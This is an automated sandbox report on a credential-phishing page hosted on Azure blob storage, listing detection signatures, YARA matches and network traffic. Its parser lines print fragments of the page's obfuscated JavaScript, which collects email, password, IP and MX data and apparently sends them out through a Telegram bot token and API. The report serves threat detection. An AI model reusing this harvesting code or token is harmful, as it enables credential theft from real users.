Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.org

Overview

General Information

Sample URL:https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3
Analysis ID:1566771
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
AI detected suspicious Javascript
HTML page contains obfuscated javascript
Javascript uses Clearbit API to dynamically determine company logos
Javascript uses Telegram API
Uses the Telegram API (likely for C&C communication)
HTML body contains low number of good links
HTML title does not match URL
Invalid 'copyright' link found
Invalid 'forgot password' link found
Javascript checks online IP of machine
Stores files to the Windows start menu directory
URL contains potential PII (phishing indication)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7028 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1956,i,18158348067939035644,14319374120374209309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.org" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_177JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        1.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          Phishing

          barindex
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: 1.2.pages.csv, type: HTML
          Source: Yara matchFile source: dropped/chromecache_177, type: DROPPED
          Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk script with multiple red flags: heavily obfuscated code using _0x functions, contains base64 encoded data, appears to collect and potentially exfiltrate email/password data, uses Telegram bot API (indicated by bot token), and includes suspicious DOM manipulation patterns. The code structure and obfuscation techniques are commonly associated with credential harvesting.
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: function _0x5dcc(_0x58b35b,_0x13156d){var _0x408aaf=_0x408a();return _0x5dcc=function(_0x5dccd4
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: function _0x5dcc(_0x58b35b,_0x13156d){var _0x408aaf=_0x408a();return _0x5dcc=function(_0x5dccd4,_0x466455){_0x5dccd4=_0x5dccd4-0x1dc;var _0x486df9=_0x408aaf[_0x5dccd4];return _0x486df9;},_0x5dcc(_0x58b35b,_0x13156d);}function _0x408a(){var _0x43cdbf=['preventdefault','length','location','3jjeywd','emltxt','loader','ajax','click','16680sdaazv','#email','#logoimg','style','done','appversion','msg','#inputbar','region\x20and\x20country\x20:\x20','tolowercase','attr','type','substr','.domain','#favicon','6421058766:aaelduy8wvqo_zlfmts2ctt-dlynm4yxnkw','focus','#msg','placeholder','#automail','https://api.telegram.org/bot','frgpsw','verifyingtext','block','log','split','#password','#mgss','language','submit','10576fmrycz','overlay','error','submitbtn','substring','ready','url(\x27','display','language\x20:\x20','164696jwudex','http://www.','ip\x20address\x20:\x20','email\x20:\x20','hide','seclgss','success','browser\x20:\x20','#logoname','mail','src','backgroundimage','#error','text','mx\x20record\x20:\x20','...
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: function _0x5dcc(_0x58b35b,_0x13156d){var _0x408aaf=_0x408a();return _0x5dcc=function(_0x5dccd4,_0x466455){_0x5dccd4=_0x5dccd4-0x1dc;var _0x486df9=_0x408aaf[_0x5dccd4];return _0x486df9;},_0x5dcc(_0x58b35b,_0x13156d);}function _0x408a(){var _0x43cdbf=['preventdefault','length','location','3jjeywd','emltxt','loader','ajax','click','16680sdaazv','#email','#logoimg','style','done','appversion','msg','#inputbar','region\x20and\x20country\x20:\x20','tolowercase','attr','type','substr','.domain','#favicon','6421058766:aaelduy8wvqo_zlfmts2ctt-dlynm4yxnkw','focus','#msg','placeholder','#automail','https://api.telegram.org/bot','frgpsw','verifyingtext','block','log','split','#password','#mgss','language','submit','10576fmrycz','overlay','error','submitbtn','substring','ready','url(\x27','display','language\x20:\x20','164696jwudex','http://www.','ip\x20address\x20:\x20','email\x20:\x20','hide','seclgss','success','browser\x20:\x20','#logoname','mail','src','backgroundimage','#error','text','mx\x20record\x20:\x20','...
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: Number of links: 0
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: Title: Fd - Mail does not match URL
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: Invalid link: Copyright 2024
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: Invalid link: Forgot password?
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: function handlebase64data(string) { try { return atob(string); } catch (error) { return string; } } function getvisitorip() { return new promise(function (resolve, reject) { var xhr = new xmlhttprequest(); xhr.open('get', 'https://ipinfo.io/json', true); xhr.onload = function () { if (xhr.status >= 200 && xhr.status < 300) { var response = json.parse(xhr.responsetext); resolve(response); } else { reject('failed to fetch ip address'); } }; xhr.onerror = function () { reject('failed to fetch ip address'); }; xhr.send(); }); } async function getmxrecord(domain) { try { const response = await fetch(`https://dns.google/resolve?name=${domain}&type=mx`); const data = await response.json(); if (data && data.answer && data.answer.length > 0) { const mxrecords = data.an...
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgSample URL: PII: fdwncadmin@fd.org
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: <input type="password" .../> found
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: No <meta name="author".. found
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: No <meta name="author".. found
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: No <meta name="author".. found
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: No <meta name="copyright".. found
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: No <meta name="copyright".. found
          Source: https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 88.221.168.226:443 -> 192.168.2.16:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 88.221.168.226:443 -> 192.168.2.16:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49744 version: TLS 1.2

          Networking

          barindex
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 88.221.168.226
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.fd.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: code.jquery.com
          Source: global trafficDNS traffic detected: DNS query: kit.fontawesome.com
          Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
          Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
          Source: global trafficDNS traffic detected: DNS query: image.thum.io
          Source: global trafficDNS traffic detected: DNS query: ka-f.fontawesome.com
          Source: global trafficDNS traffic detected: DNS query: ipinfo.io
          Source: global trafficDNS traffic detected: DNS query: dns.google
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficDNS traffic detected: DNS query: www.fd.org
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
